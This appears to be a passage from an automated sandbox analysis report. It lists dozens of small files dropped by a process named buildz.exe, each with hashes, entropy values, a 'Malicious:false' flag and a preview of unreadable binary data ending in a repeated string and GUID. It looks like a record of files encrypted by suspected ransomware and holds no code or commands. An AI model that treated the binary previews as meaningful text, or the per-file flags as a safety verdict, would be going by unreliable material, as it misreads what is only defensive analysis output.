                        Preview:<?xml.:........(.k..eW.N6.A.........@8......c.YD4...:.EE.....].t.xW..;.wi......|".......0"?e._.6.q[....^.g..T.. L..;uL#2..I.=6..e..J0...`L8@..{SD.....l.E.s.0.RbS=.M....t+.A.....s.c^..q..l..J..cx....nY!.k.&LDW.....N]...).'&.:%..Z......%.X\..P}.. .... Y.o'g.g....^y.';.<....~.aFg.I_....+*.....e.p&-a=....._......Re+......^q'....*....`..v.2S...H.G;..DR_.b....[@.g..#1....c.....O..^h..1......Mr8.1$....ce..F.U..U...r..R%...\=v.....=.UR..c/N$.......1...Q..a#s...A..,...T......m.h./....6z......'...I..qIvP.z...w`(A...*......H.w:..@4..CW....m..d.c..\.9........6.<>.WymS..t........!...n]W.x....d....?.....:.._.'.....'....Z.../{|Y.N.....,..bEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):804
                        Entropy (8bit):7.697910253743905
                        Encrypted:false
                        SSDEEP:24:b0OJ8RgoSn92uXYOERNsUMAtMDfwOILGbD:Ae8ioCpo323VDIOaUD
                        MD5:4486BFFC90B087F967B09D84210493CF
                        SHA1:4584B997FFC0B7C8E9F9542F99A5CA3EB251A1CF
                        SHA-256:A1A382304F2378A589C049F4A711D60A67C49A29792FD4F65225D241B6F50C48
                        SHA-512:541AE151B5973D09EB313C3C9D7138C1F2320B4B5EB78517A793A4685D33491C087270C72D09CD3C05E78702CF2E888C9189806080991078F2A509318C276EBC
                        Malicious:false
                        Preview:<?xml....f..zO.R{Ns...[5/,+.y.w..C...O-r.4.....e...:H..J...J..$1...K.Z.{H....%.l..0..v=..*c.|.B....?%.\.."&7S5..9..l/..W.....D...._4{..P..:...i.m....?@.<................m".]..\+E6..N.D.s|.X.....>..K..w......@4.W*v.)....k......U(|...qR..};...n.. .......=k.Oeo.^.-."....`e.....g%-.....e.9s...'...sW?..T(.v......{.....l@.n..T..r2../.N@..J}Su.P_.+..'.9$\.....~.).f...O....7........k,.C.....pr...v...TX.%......|..,.T5.q6..c..T?.=..._5.}\.\.<..IZ_tf.w..L...A.<g.@$...ty{0........}.......6..y..#.7.5E@).....b...g...".8.....7...*.e..O.mc.[.8.u&(o....ZA.[)..aH..srO.wG.\......=O...7...Y.+b..X.- R....'......(2.."...w.i.Y....i...9..".G.!..&T..y.F. .a..%.......n....08.2_.fK`I...w.W......z..KD. ..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):752
                        Entropy (8bit):7.661888999322432
                        Encrypted:false
                        SSDEEP:12:OIa5+qyD+z2N8Mwrd1pCRWiTwWz4gg09rgw6vsHIpXUX461+g0mpGBjz26Gcii9a:OIIK2dDCRLTh57rksHUXUX4xAGBj7GbD
                        MD5:B87BD8CE2A06B16AFE53C02983DC40CB
                        SHA1:4CBF5A3C22C0A9E6B4E23131964753AE1BACCF12
                        SHA-256:F63C4E8F07F7A3836DECB2FD4C4AEA3A4506A169261B0EE7D0882EE6711D3C02
                        SHA-512:E736F77EF63E2955050C5A5F6FCDE583BDF26941C127A906087E6E76822E30CC8BE030F58D174E20074EA253B9977D6831B9927FFEDE7ACA32A5F01A2F634910
                        Malicious:false
                        Preview:<?xml$.y..}`.>#&8.j0..$F...|...R8;^R!W.0Z..N..-..31.M....h\...+.... ....{.........R<GK_.F.&{.ac.....*....Ah...>/..(..1...;.RF...gM.E....\.vjY.<e.r.h..T.4.S..K.t..j....C.q..a....yH.h...7.2.?c._x.....ko...,-\..R3...t..ZfZ{..^?.^el...`.UMs.S.~@=(.4.#wYU%..Fa.........P~..`.9.@o.o.Y...oR...~.4..L.......,i7...oX.6..:/:m.H.....-QV+E.........c.....t.LnR3[$Zbz0....S.....C<3e..4...F.sa..W\.....b..!.hg.s...^^..v...O%M:.3..^...........? ...$.A.l.....s..t....I.\..W@..bLK&.9.Q.....:oq.T13:..0..L..p..l..E.......*.C......>..R.:...w3....)M.:............'.O.k..*........T..Amc.Q..#...M....1...oQ}._.....g...e......:.,.g.?V&....Oi.#.24+1/..<N.....{..9a..Kr..&;..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):827
                        Entropy (8bit):7.731191421008416
                        Encrypted:false
                        SSDEEP:12:AfYvz0n0PxGCex1Mg+101u5Zk05GDfy2cjrMQxNzMVPaPa0dve/26Gcii9a:AfYG0PxGCexC+10asgfncvxNJ5eHGbD
                        MD5:AA7B926E27049F3251BDB6A660ECAF72
                        SHA1:704C74A71783D684669561287E182F2BFD0CADA7
                        SHA-256:096D6D081DC7BBA96079604549083D7E4F76DA803FA45790ACB70FBDBA4FB422
                        SHA-512:324CEF998AFF5A8D6D42E25DA5873B42129A8FD9668840E662F557D29E6AED04C18B41ADF37BBD9DBCBA6BD5728254A4173D4ED41E0241819F34106567CD7FFF
                        Malicious:false
                        Preview:<?xml3[Sg..o...t......I"L..|#...q...zo.u.B.#...z|....6....d.[..a.J.!:.U.A.9D.}JZ.E<0<.Q..........<v....}.n.&..o.]#0.-.|.[1........L..).g.d.!~........zD.@..rL0kh..........7Wp.Qz...v&.D/.../.'...3..YLy.`.J...."_xW.....`.PfM..p..x.[....r.H....*.g....\..c..6..S..@C*!...4....cH..tFI..-=.DvL@..1..H.&.Ama...F..dXqJ....b...+..d2...j..c.6w...D..G.Dg"..8.U6........Zc...[g..I9@.G"ti..l.......j..c).Q.;.E /VL..6..#..`y...w....._.hUu..F.).m.q....0....2y%...d......f.p5V~tHX$!.R...Zh.p.=Ua]..a...G...'.....4.z..\..P.|0..NP?..,n....K=..;Z?...`#...eV..8..$\.d.V.(....5-.Uw..g..7.Jkz.k.h..&~p.......h.I.a...........E.Z..Nso.Q.r.._..p...h.6..U>.......E..:..Hj.....r%..|..C.9....e...FJ>...G.......;.|a.T9...m8....3=~......*1...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):753
                        Entropy (8bit):7.692768538176777
                        Encrypted:false
                        SSDEEP:12:avacQIddY3DEEPDUnyuiFpoU2+9mmVXn/EosqEH4LgPklRezqVRj+r46z26Gciik:wjT7WDtvhTotemqEWEH4EclRegCr467A
                        MD5:B4FFACE4F3B6CB9B4479D4DE1BE2F875
                        SHA1:DA3EC8AD2963466BFF96B8D573045875E4481BB6
                        SHA-256:0F443BF17214330826ACB0191E268725D275A2DE41239004856068EBA3EA1F94
                        SHA-512:DAA771531DEE22B3AE39EF7F6429F8B6E32316A4EC548A4C3D02FF9175A6661BDDC20B5DB3514003D2BEF5CEA6EB6C2996AE5C33D29C6F7B97916CE0EF1EC77C
                        Malicious:false
                        Preview:<?xml7r..(.U....kg.)) W*u`....J~vp.DE_..?.Z..6..MU.x.4.|..,..4...@.....-.....#(K......s..k...G>..k*{.d.y..... .Vz.]...6.Y,.w...c.IK.L.D.>.2&B/B:]....f.Xp..Y..2.8...L.=...$0.>{..Gym``...`.;....?..I!1&....)x.......j.d...%.D.#g....?.D.o....m*/.8lR.p.._.....U..E.I.~4.B..IJ.Y[@..$..a.9.)u...vP....(......F...3OV%.>...z...zT..9x.....qH...]..;\_l.^.2..|s@..H.[a..t.....:|24.;.....n.w.d-......./,.B.Y<.#.....xLW...E.n.}.......sS.. kL.9.F....w...b..DE.!...:E...u_....E..'..,.u..4...."l3:.......k..7.u..L./Jr.;.78'CF..bYBF....t..l..C5.t....}..{.......:nSU.[.#.T...z.!_....e..U......,..?.....f.&...\._XCL..iFhY..6\8T.....4..+sI.S.. ..&J.....V..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):805
                        Entropy (8bit):7.715821265818492
                        Encrypted:false
                        SSDEEP:24:ymcnKVfRta13r4zG0TViA9INOJ9CAe2GbD:Bcmy1bejl9qsCALUD
                        MD5:D0423DBDDD9C6723C5FDF94BCD28D8E2
                        SHA1:8F6B9DEA8F71BDDEFD0FA022AAB3EC0EAEE5CADE
                        SHA-256:A6F40A61CFA5D23E27A530A3D8B8E5AB2401D8545C8597EB0A0FD7366C083A56
                        SHA-512:2E88D9B9B3087E5027318AC7C54591785F4D253BC22FDD11467825497347CFFDB254A8F69AE9D7F65A87142A6E9B18767A16FD386D3AF679FD554E6F922B1E81
                        Malicious:false
                        Preview:<?xml...;%...I$..n......>f.Q....J.....N!]|y..A....D....<Q....D.v....:O..yp.3..w...p>1*v..xs..).....Y..gp_%........6......[....].....B........dj..]..1k..F....&.u.../....x.c..z....r..}#...'Q.F.........&...B....D.>xoy..^......o.../z..._..?..d......6..u>..+.B6.....C--{#..1......U...A............8t...&f..}...>8.|D3...w.*..l..Pli/..!".......Q..f.......!.E.%...Z.....a*....[o$cF~.R+...B.....U...UIN......"PP....U2.HT..f...<.[....<.C....f..t........WV.......L...pvT.....T&..m.d.ERx.....W.oD~$3......N........R.Q.....3..m..A...)b&Y.1.'..}.Y..v.u...@"N..[.j..D.._...E.....W(.#D[..<.&\..i..zh..GJl....;.s...%.R.@.q.....09.......@..m|i.*Q......N.....;..7..U6.1...y._.n.G.5..0:.....}.S.ZEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):760
                        Entropy (8bit):7.716316524954911
                        Encrypted:false
                        SSDEEP:12:ym5RHS3pyc7zFt3sEAXMu3US2sjonzHb+1Vm4UBlgIFckkG26Gcii9a:kQc7P3/AXMukXsUnXqmdDbFckkEGbD
                        MD5:46C9DED2304A75C2E12CEF488829AE95
                        SHA1:90D4BF3D104CCD94BD9A39333AB748028459433C
                        SHA-256:926A56A54DA30934B3A5AC10877889BFB0E497CFD68E4E801F148BACF0E26187
                        SHA-512:E809854C8C33FACC8C8EA7CA522EF2149E20DFD9321F18AD0DDFF40AF609491AE525E3EE229F5DB99ED318281BBAFBA296A3B374E3204BF98972E5B2473D5B7A
                        Malicious:false
                        Preview:<?xml?J.%J....8Q.......o..bw....m....IrQc....`.......P.......Y..0.6.]..Q..#.!..8L..|..|:..,.....P..@@.*.....iK.....m.../I.f..<.::b...C...:..z.`.j.I..`..gt`e...3.0}..LlH.b.....l.B.|.+.u.{......^!...|;0.S......4XX`....V.f..4..n\.;.#OH..Q.,.dR..i]>..#o;>.A./s..$xF.!_Y.)W X..v\ ..x...l.P..J8....V.0....x.ei.....1S.t...,.Q.....FO.t....6a...=t5..]..Yj/.....+C.\....S..m.......Df.G.[hQ..R.oT^u..P.qH...7>..bRX...jy../...D..(A...k,...^>^t...t..j.H[\.........`....*J.b..0....&-VC..A....fZ].V3+.~|..5.....aT...t.....!.T[.]<Q.!.K.L....7...%.2..g+J....vdG,.].....A..P.uF.......zh...6sAR........V..........,$....d/j...}%.x.p...... ..........."EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):819
                        Entropy (8bit):7.726697677390906
                        Encrypted:false
                        SSDEEP:24:+dXyro60GC3089Nf8M86ZtMl/wM9CWoGbD:+kbP3gz8iyVL9CWoUD
                        MD5:96C1C98AA809A6B53FA706C5B9A99AD2
                        SHA1:404E35D2F76F8C9CB73973F774F8B33675C8CA52
                        SHA-256:E65C5B0CAC4B86D18D09B39CD553C5DF53239FE16EC4DA4DDF8A9BE9C5BBD07B
                        SHA-512:B7E5F92C744DF9B88453ED725B36DEEF7F9F8359F0AE522543976CDF49784DC7FFDE3D4948EBECA16DDA9E44BF5885FF2517A833476F28B9622A8807206C0891
                        Malicious:false
                        Preview:<?xml~.,'..R..SQ.gX<...j.>.B].r....WG..C.........[V.q....(Y...N{t.].....D...IK.r...G...a.3E.?..x\.........,....<. .\.4.....7MJ..5)..b...|C......;..F.9.....K.-.WS...o.KG].....<f.X..8*.1.m..S0V.23N*Ru...9L..^....R....T....]u.........%.>....%eb.Cx....Q.%.r.G. .....t..4..a..Cg.........D.6...4>.P...."gv..Ja.`...h;L...I..Se.j.wfv...P..#._......l..-;.....O...@@a.J_!.......w1..X..wE.#AO...A.`.;..>..z~......Z..=...RDe.B....y.2.h...V.......o..A.s..~..J.A....2...a1Yw...fLQ.!S...K..a......W.....8.Y/c^DRT..;..?t!W..2.@.g..w.f...W..,`..k}...~B8T0.....Y.U.dV.......`..w.#~.G...g~n/J...V..l.;~.f.W..U.v..+!h^.}..aJ...{....x\......-.UR.@.IZ.....t.:..[w0Ch+..M2...8-.W_fqD......:.....-X..:.\.F..F.R.}.i.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):756
                        Entropy (8bit):7.64920819928014
                        Encrypted:false
                        SSDEEP:12:dX/aGD+OOH9//4xaWp/OtDMf7LvpAOqD4nLvbvKKz7pPIFWaWlFrSc8X5hlt4m1j:dviO84HpmYf7Lhd7KKz7pPNtrb8J9h7N
                        MD5:22A72F642A1A947B4301C09364D2E4BA
                        SHA1:1E1CEBA9352D736E48730110E7E75C7C1A9FC39E
                        SHA-256:47485FBA8162FCA2FD607FFB587B34AFE2C3F6E0862A0397675D0046A771E805
                        SHA-512:F21BAE8E754FA44AB1242C3B2A4CFAC9EDFE3B02E2D9AB3177A75348F06C28F951FD54755F5F85A7F86412379136442D5BE144708A14DB45E447CC0F4B4AC0EE
                        Malicious:false
                        Preview:<?xmls...rU.Q.....j..K...G.?1 O.....r..&....5...^.F.V......4...(...Z.~_.....0..g...&M.......7..<...d.t.....E...o+.....Q...l{..v....TE..!...vg....<...GRX...p...vnH)...!m'[.h.Fhgq.Ja.....n.yCA.. 1...b.`.}.y9}.gB....D`.".}..!g:?...O...Bc....h_\!<.9..uF.$....I._J.....L..d.(5G...2..|..q.Oz.Q.=.t/e........pWB.^G..@`..*.`.3..I.).v09?.viZ8....;b.h..a B&.'.....m.h.~.).........b.'..b`d..6.kC.[....A......G...D.sU..4.r...PT[...&I6Z....!..QW.o.w....n...u.......4.M:..0. a.$.a%...:.Q?..b.....A.q..:q.U.......8. W.<.HH.V..G%l...k.GoK.:$1.~b.'k../.n]....c.c.a.F......l.|..,y6.c &.....d.0p.d-iD.e...p/)(^.x1!.UV.........k..b.!...j...A.%..Uj.*g..Krq. .....'.5....}.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):811
                        Entropy (8bit):7.680584313885273
                        Encrypted:false
                        SSDEEP:24:LoQAeI+OXpK4DD8IXb92knD2RDQZx178GbD:HAeI+V+wAn2C78UD
                        MD5:486A9F82C3BB58DC113FD449F9D09D88
                        SHA1:E57734152B307D6ACB2CAAC965416F05A91D92A2
                        SHA-256:9F2B26D98708ED6E0228B70F3B684AE0E225805BB6B9FD84DAB729B80C7563A1
                        SHA-512:D255D92E28C9E01D138C32DAD5475A530B733FE9853B601E8A0D83D509A092EF180A3644FDABE8AE6BA020B166EB2FF0708AB3DC00BE9445F09E1EB55E784AFF
                        Malicious:false
                        Preview:<?xml;....sA'F...y...x.!.G$....#;.../.+..............RO,..F..... .:......;.#i..G....@.q...UH6...7.3.Zvq7.h..s...5.P .....U\$4ft..+..(BxJ..2.E.!|.q....Xpj.#....m...L.k....Bp.,S[.'..zH@..%........z..;.>;.kp.^.[....V.o..OI..+...2i.]'..w.OU./..$8u.....,V.O...f...9....Q...No...+....UP<1....hp...G\H.P..q..}.7O.2.H..3.P......3.fu.#n.-..sB.$.>....O.(p.L`..[.I. ?IM.x.#...V...j.|E.+.8.....^.xC..m:.....\0.DG>..-o...............*.Y..K.}.5..o....>..:Z.\.........d./.*...@i.o/j..{.p.U.Bw.<..E?...?......_)....'.ON...l......p....d..s....LA......S.C..2...a@2..}+.&..[.Q..-b.'S........Q.........jq..X.p..K.9n...&.0.'.c/1...[..;V..A....k.b...kK....m..#..F.....n..F.k........m...p...U....&........N.p.n.......V....8YEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):737
                        Entropy (8bit):7.638879189770006
                        Encrypted:false
                        SSDEEP:12:Ek7EnIbOZ9MaK+uZvWXcQX1/Z8rdO/63WMtVw4jFoZIdYr026Gcii9a:Z7g+OPbMWMCZado63VaSeGGbD
                        MD5:8C86B8A2675AE287265BA3412D1C03C7
                        SHA1:B0B606DC45FA5C11516F566A14243F21D9D1B941
                        SHA-256:5D5BD2E202B7B7E54E39AE3E0960DA95C6610E8EF1AD61A7A07FD6AB44AD6D2A
                        SHA-512:B3D6683F0ECD8283C26522FCA08A85C03FF18C66D6A46DA7098DD2478840B57A521E57BED0C97C3BB6B075C55360D46F6BA957FEBD94729C090B3C46529D12EC
                        Malicious:false
                        Preview:<?xmly..NQ......-...lT.........B..Q.j..E.@...];..ZZ.\..&......:..*.R.}...xD..........z.s.....@......<..&-.T..p.)......B.....E....-G1..b.....<>.O..i....q......|H...:.#e.2?.Y...aq..\AbT..H...&........}.R#d.Q-.`......fD%..t..!D.......?.w\..?c.s..P.1}72Q.X..&..j,\.WdQ...ug.%x.....P.AdE.)3$.6v...M..ke.......)w\|.@.).K..'.../.M......#-..e.{...S..:...w}..S...V@7..$...q....?.y........).......2.?.)..p...#z.m<..l,.i.r....TvP....4..u^......M|.Fo...Y.[-@.t8e..$q.C...d..U<.....P+l.Ux...bnX*.W.;CQ....D.\.a.*.<I...X.+.$....4<Ua.Rp...s/.1`N.U...M..YUO(T..n.tH.i....}....."i.....M..U..{.s....6B.Cp.S4.5..'X.....D.A..J..FL._vC.....(..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):801
                        Entropy (8bit):7.71456984881071
                        Encrypted:false
                        SSDEEP:12:TKEkUp4pUN0R2j4u6Jtme3UEcRBzJl6AjvhmNTgDWOWzXZXKsQzZrYR7hZf6nc3r:TKOpP/j4u6nDd+Jl6AbWI87LwZ6UHGbD
                        MD5:67CC8507F28254D11148ECBCD27F6872
                        SHA1:33F7C7D9474584A454573DBBDCDA9295B46268DF
                        SHA-256:9CDE10FEDA0421B4692D52F99169AB9E6E87CD4246AC178F39ADF34B91768117
                        SHA-512:EC963A8E6138288FBA63779D299B1D173F2544985924E7F74DC58475955A6ED58E462A77AF7ABE040DD2CA14BC04E3ACA541ED95DF7280D9CDDD14E33CCB50B6
                        Malicious:false
                        Preview:<?xml..YR.<Sj;.cW....oN....hV..[....c.D.1...G.+.qd..<.+...L0...BdYk.~j..(.^....:.....W..q...6.7..Z.....2.gJUxr..MW......ki,A].t.f9.@...V\.....RMux.[.q .4.C(....*..Z.e.E.h.!.A{..H`...=7...x....?X......xCvRO.,o6B!c..W...=I...!.*. ].O.Y|...k.".LsM.........>D..%.,.%y@..A(?C...Q....Ld.s?r1.S..<'....8...|.o...$..n.$...^.'QX.gY<W...T....]s;z8N..F....%.?....|.B....=.@d...[j<z.f..=x...+..\I......c7.R.cYb.......^..I.S..b...K....y.\vM}o..E}....zZ7V....)..e.r....2.....&..hY...N..L.%.$-.WL$..-.... :.. .\R.q...0......{7GE.!.o#..-...x(....W..t.......d.I<..%.........."..*.....].[.$.w...^D....6.....*..K],..2..XL.ac.W....-....>..Qf.P!...26....8.H...Lz.!.y.:.@.A.|..m.ws..3|5y..Q:.5.y}w........5.K\.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):733
                        Entropy (8bit):7.69746967674737
                        Encrypted:false
                        SSDEEP:12:JLdS8K0gYpU6AHOCM2cHihlXTAb0lEr2hD/+yiIC+dNhlsS2RVxL3mdil47s426A:nS8K0v4HrZcHGlXTAQCr42y7vnlsS2z1
                        MD5:9125B592674397499FABE37451412D37
                        SHA1:91160F948795E3EE1951F078BFFF7F64943ADDF7
                        SHA-256:21E0255C84C62A545B57E2ED70177C3E5BA69A13A91E3E1B3B5FF2CD02DE9080
                        SHA-512:10783884F2643B25F95EE348BD3B4B3853D3088E6295F951AE11252B34B7646A1610F4C6D609679D1700F51FFE730E2C5BCA2A7F629DFACB909B6E25465D5F83
                        Malicious:false
                        Preview:<?xml;"...........i............L. ........n.H..|A|%.........O..5..KU.PN8.Nj.=..Vg..p......m.M"..M..&..|.L.x...{.M(}.^.?....*.f@{pSs.....j.....@.....#.M..L.i|%1.ZC..b.....c..q.x.&..p./#<}....$.'..$....X..C.'..2.v.{...@.....'..f..s.......|"..........@.7...C...B..qE...:..X .......f..rO.o.i^......x.e.d..y./..9k0.E.g..>......w.-..(.....|.!.6k.O.....G.."R..k.h/.,.R....D<r:.C;.....n.l.*j.....tZ......o=l.3[P.L.....h.,...a+..d6.@.....f.{.k.C*.......)..N..F..7ge./4.;F../ .....RI.a...f....o.d.~....=..A..Z....$LT..\5......{..];*~...?0.?.Jk..|...,.......*....|..O.x`1R:....u9S)ep...*.V...\../.....c..D.-.p`.>~..RM....".1..85-EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):812
                        Entropy (8bit):7.7275541339232
                        Encrypted:false
                        SSDEEP:12:wRSRgaWJIYY1fXcQGo7bH6hitXAvof1ttILsP+3pEmcEylwYnPNW2k626Gcii9a:w4RFx1fsQGgbH60tXWWt+YbTW2xGbD
                        MD5:61EA28F566E205DB5D6C31009AD74474
                        SHA1:C965BFFFCC9EC5CDED8D81DA0BDE0B31A06766FE
                        SHA-256:F46F4BCAB6B5218975E656ECC2315AD2FE08F9FAED47C208E763C6089366A303
                        SHA-512:1E4C4B3E4A3A143DFCD688D6DE917A13AFD4B0DD7A80B4CCB4F499850CB73621164227BECA6B2F11CE696F58D99890C8D56C361E4ADDEE4D1DBC742EF8AEFA6E
                        Malicious:false
                        Preview:<?xmlM?...m...=.<...\...$Q[1..h.V,.a..T:..g...Zm"..W.....N..q...~B..G......|[..O.q.f.....-Qb.. 0.c.L>.'......p.0..n5.t..c!...}p..............k...X".y..........H..k...............nk.{.!*...;Z7...+0.....kdS..w].{......#e.0.'O....f>py~....n....5)Q........3.lnX.._.NP...Lx......% XX..........#B...q^.=..b..q..-.....#..3...A.......u....,.b.(D.y`2.]8E...7k.(...._.K.3q.$.`S...W.6pH3.X..;.ZFuA)..4.u.~"..HR.e.y.d..~.V..c.);..J...m..:.sl.>`....e.v...z...i...q.A.5.....gL3g...E.iZ..4*+...%.][.2U.H..=...ok).d8..{?....../.k;.OWW..K..)$1....?.~.L.3....F....l.p.Q..U.....I..12.v._...y3.....O..).$W....C.>...s...bt.z/.*.JJHq......@R2;.hBc.R....j......g.?w...uj.0.b.....[C9.....O....;......`..|''.ZV..O......[.C..-eEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):758
                        Entropy (8bit):7.675362378943451
                        Encrypted:false
                        SSDEEP:12:Ei7/JH3iqdE3kagoC3bSenUuphHn7ywmMjmx1Al4WDOGA2lzJdnzR926Gcii9a:t3RXrtZhH7y9xGTD5VlzJxFZGbD
                        MD5:8DB24200C1419C950F2C6961B891F388
                        SHA1:AF9A64464145B0E7C5F832A76AD016E1263EA1F9
                        SHA-256:EF1E2239E4A7FBDD6D9751454593D69AE5AE74C8A140FFF9E75B99D6402F933D
                        SHA-512:57ACE0CA4A8645227758D442373B645DB144BBFD96B1DFFA8F4E9A07C3C3438C773221E58FFB96E6EBB1379B03592570D2D5D0A115CD010DE7EB4C23B62C1BAD
                        Malicious:false
                        Preview:<?xml..N.S.z......e*K^....N9z.z..r..).@...A.....S...})D.....Xg[W..7...Z.k.z....z.f..!.._:7.5.3...!h.9[.:.y.=.......7..........T.8. Nx..*..NJ..;...T.D.r..E.-.;.C...I.j.-.B...4W...|...;^......S~......s.^;d.8r..U.../.....S=@|fZ-..f...3E..)...(a.2%....*r.!.y..!E.y..k.,{&,.X<..G.o..J(S...:.%....).oG......._^...MQ...zvr.0LJ.......7...QC6Cd..xJZ[B......":.R.;+....E.;e.o..*.M&4..UO......bavRAi2%K....i......S..m...B...3&.....3...+z..9.....&..*5-A.r....t.../i ..m.....Q...........l..(..Il.jMr..L}.w...8..].-.}.R..K.. .Xw.H.S......^..?.....x.ef.....=...@.:l..... o....A.rO.%..h...`j'..l..;>....q..s0....q..,W.3./......A.....,W .4....T..H....!..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):808
                        Entropy (8bit):7.733508082215825
                        Encrypted:false
                        SSDEEP:24:0+1SHh04L3UB61r8V6jrlg5u3ojHelSkGbD:FVwEB61gAFS1e0kUD
                        MD5:C1878BD9C6CB5E065E05800DD54FCAAF
                        SHA1:779F3F8AF9FB8B125BDB57893B420346745B533A
                        SHA-256:43E498B56B6FD81B200A846851E1594F53DECE56D39029B7C032C666B5FF6654
                        SHA-512:EC265BB9FF68375D9C4AEC5DA51DB6B8661B4E7B1D0D4039DC993E8A7BA4698AFEBD8DA974709B4EEE755FD55E44516138DCC830CD9BCF0F03C3A30B1161C860
                        Malicious:false
                        Preview:<?xml[3.......D.."w..y..Xo..p..%hV.8...~g..}L$.....ct..P...K.Vy.:..V.......$AY..Y.9$8....6uind...~.I......j,.Qf.O...c.....fjt...........M..^u......3..ig....R..J..ia..D.UjJ....O.D..Z..X[t`.V..&z$`......p.cq...I.(zcB'.7.L....=?....._.;~.B74h.|r.'.^..x.v..W........^<....3i.Q.......zw..2..9)..?.$.c.....@..i..:.....,.......^....m..a..`...j.&.-.,e.<.B_*:V.I......:E...a..B.......K..M.(.6.z6.%..,...[..kg.=..X2.0.Z ...@...6.Q.............q;Q..2..K.ju.Pky...{.;D.&...E.BH.....Dn.\lQ..4.df>....@8..=V...Y.......j..;...<..dU..ck5.0.#.....!.......|....X..+8..v...L\_..s...p?....WO.BV.R4.4@...R.'..,..i|.K:..9.j...\.L....hbP.b.;......e.p.../.)8.}..$[.#s7.p.r..A..A..)B1.{Nm..X.ap...;.X..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):781
                        Entropy (8bit):7.687098997175865
                        Encrypted:false
                        SSDEEP:24:g3/S1gcP3KvUSpAcKrG8e/mDKuAWk+vrqQOMzmROYGbD:g3/igcfKfYYsAt+jqvrUD
                        MD5:3523DBA8CEFAAA4283A47604EDACD151
                        SHA1:476233B1EC7D04DB42ED524B11440C3211281209
                        SHA-256:76AE0D66F059D64E85175AE3247D2AF00E2DA460EB12871CFC63AA84F88B7F30
                        SHA-512:12A89B1ED814BCF49FB07D5B629A4AAAD2C18DB3FCAA6FA960FF994029058583A335C303D98BCDC6AEB7CC403AB120282D6E4F0D9CA8A0809DEB39E2A4AC60EB
                        Malicious:false
                        Preview:<?xml.......S.N5......."BC.cB.z....}T...;.Or ..wP.r.Rf.i..j.....6.2....A....f.....F$.0.hA..M)..a....}..&tz.r.V.}.:._...j.e.3.1.,.....D.....|....I|....u..W./..?.......Q.!.PK.1..K.H...%.[.Kh..S.B.e...Q...Yl....c.D...?5....L.....0.....uWw..r.:i}.^.?.:.!.N....59.......[....>.0..V1..^.D...Cw......s})..^...."9.....y.....J...}.....'.p.)V.*[?..y*.=H *.#q....O...W..XK...R.L..........!$@o$...J(...x.]RD.J.`fH.w...8......jS...'}.9...pU.!!..(,..,k.i.28&... ....m.....A.ETC..ke..8. .W...]'0..9...2..8.....0.]......P......:...8q!x..5.H.[..y.^...E..i..'.4..V....4.G.;....HS^A.Q8k....bB..J.........|.Jk....%.D...=......)Qq3.!...........`{...U.}..................1..X.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
